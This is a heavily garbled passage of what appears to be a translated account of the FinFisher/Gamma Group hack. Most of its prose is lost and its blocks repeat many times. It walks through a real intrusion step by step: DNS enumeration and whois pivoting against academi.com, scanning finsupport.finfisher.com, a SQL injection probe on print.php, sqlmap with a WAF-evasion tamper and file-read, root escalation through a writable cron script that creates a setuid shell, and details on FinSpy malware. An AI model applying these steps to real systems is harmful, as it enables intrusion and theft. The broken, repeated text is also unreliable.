, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
https://www.corelan.be/ (Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
